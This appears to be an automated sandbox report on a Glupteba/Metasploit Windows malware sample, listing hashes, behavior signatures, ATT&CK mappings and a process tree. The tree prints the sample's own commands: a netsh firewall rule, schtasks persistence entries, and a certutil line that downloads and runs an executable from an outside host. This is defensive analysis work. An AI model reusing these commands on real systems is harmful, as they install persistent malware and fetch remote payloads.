Overview

overview

10

Static

static

48bcb0bff9...0e.exe

windows7_x64

10

48bcb0bff9...0e.exe

windows10-2004_x64

10

Analysis

  • max time kernel
    146s
  • max time network
    165s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    14-07-2022 02:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    48bcb0bff9f10f88902a821b34b2e9df15fc1d9af72374329bbb3e1014ded70e.exe

  • Size

    3.9MB

  • MD5

    6cdb82a5248095408ead1969b1c30f4b

  • SHA1

    6414d0f3dc303c834f0ddce218139348074bbdac

  • SHA256

    48bcb0bff9f10f88902a821b34b2e9df15fc1d9af72374329bbb3e1014ded70e

  • SHA512

    c733680634d575fee025768842f769e9409e6e90a4d05a2eea572b489107448ab87f86205f742e66cc95acb78093b26b0cbcc1e1021ec325d82535213f39401a

Score
10/10
gluptebametasploitbackdoordiscoverydropperevasionloaderpersistencetrojan

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

    loaderdropperglupteba
  • Glupteba payload 8 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

    trojanbackdoormetasploit
  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\48bcb0bff9f10f88902a821b34b2e9df15fc1d9af72374329bbb3e1014ded70e.exe
    "C:\Users\Admin\AppData\Local\Temp\48bcb0bff9f10f88902a821b34b2e9df15fc1d9af72374329bbb3e1014ded70e.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2944
    • C:\Users\Admin\AppData\Local\Temp\48bcb0bff9f10f88902a821b34b2e9df15fc1d9af72374329bbb3e1014ded70e.exe
      "C:\Users\Admin\AppData\Local\Temp\48bcb0bff9f10f88902a821b34b2e9df15fc1d9af72374329bbb3e1014ded70e.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4092
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2340
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Executes dropped EXE
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1032
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:3480
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:484
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          PID:232
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:228
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2172
  • C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
    1⤵
    • Modifies Windows Firewall
    PID:2280

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1
T1053

Persistence

Modify Existing Service

1
T1031

Registry Run Keys / Startup Folder

1
T1060

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

1
T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1
T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
    Filesize

    1.7MB

    MD5

    13aaafe14eb60d6a718230e82c671d57

    SHA1

    e039dd924d12f264521b8e689426fb7ca95a0a7b

    SHA256

    f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

    SHA512

    ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

    Download Submit
  • C:\Windows\rss\csrss.exe
    Filesize

    3.9MB

    MD5

    6cdb82a5248095408ead1969b1c30f4b

    SHA1

    6414d0f3dc303c834f0ddce218139348074bbdac

    SHA256

    48bcb0bff9f10f88902a821b34b2e9df15fc1d9af72374329bbb3e1014ded70e

    SHA512

    c733680634d575fee025768842f769e9409e6e90a4d05a2eea572b489107448ab87f86205f742e66cc95acb78093b26b0cbcc1e1021ec325d82535213f39401a

    Download Submit
  • C:\Windows\rss\csrss.exe
    Filesize

    3.9MB

    MD5

    6cdb82a5248095408ead1969b1c30f4b

    SHA1

    6414d0f3dc303c834f0ddce218139348074bbdac

    SHA256

    48bcb0bff9f10f88902a821b34b2e9df15fc1d9af72374329bbb3e1014ded70e

    SHA512

    c733680634d575fee025768842f769e9409e6e90a4d05a2eea572b489107448ab87f86205f742e66cc95acb78093b26b0cbcc1e1021ec325d82535213f39401a

    Download Submit
  • memory/228-150-0x0000000000000000-mapping.dmp
    Download
  • memory/232-148-0x0000000000000000-mapping.dmp
    Download
  • memory/484-147-0x0000000000000000-mapping.dmp
    Download
  • memory/1032-145-0x0000000000400000-0x0000000002F5D000-memory.dmp
    Filesize

    43.4MB

    Download
  • memory/1032-151-0x0000000000400000-0x0000000002F5D000-memory.dmp
    Filesize

    43.4MB

    Download
  • memory/1032-140-0x0000000000000000-mapping.dmp
    Download
  • memory/1032-144-0x0000000003800000-0x0000000003BA8000-memory.dmp
    Filesize

    3.7MB

    Download
  • memory/2280-137-0x0000000000000000-mapping.dmp
    Download
  • memory/2340-136-0x0000000000000000-mapping.dmp
    Download
  • memory/2944-134-0x0000000003710000-0x0000000003F14000-memory.dmp
    Filesize

    8.0MB

    Download
  • memory/2944-131-0x0000000003710000-0x0000000003F14000-memory.dmp
    Filesize

    8.0MB

    Download
  • memory/2944-135-0x0000000000400000-0x0000000002F5D000-memory.dmp
    Filesize

    43.4MB

    Download
  • memory/2944-132-0x0000000000400000-0x0000000002F5D000-memory.dmp
    Filesize

    43.4MB

    Download
  • memory/2944-130-0x000000000335D000-0x0000000003705000-memory.dmp
    Filesize

    3.7MB

    Download
  • memory/3480-146-0x0000000000000000-mapping.dmp
    Download
  • memory/4092-133-0x0000000000000000-mapping.dmp
    Download
  • memory/4092-143-0x0000000000400000-0x0000000002F5D000-memory.dmp
    Filesize

    43.4MB

    Download
  • memory/4092-139-0x0000000000400000-0x0000000002F5D000-memory.dmp
    Filesize

    43.4MB

    Download
  • memory/4092-138-0x0000000003405000-0x00000000037AD000-memory.dmp
    Filesize

    3.7MB

    Download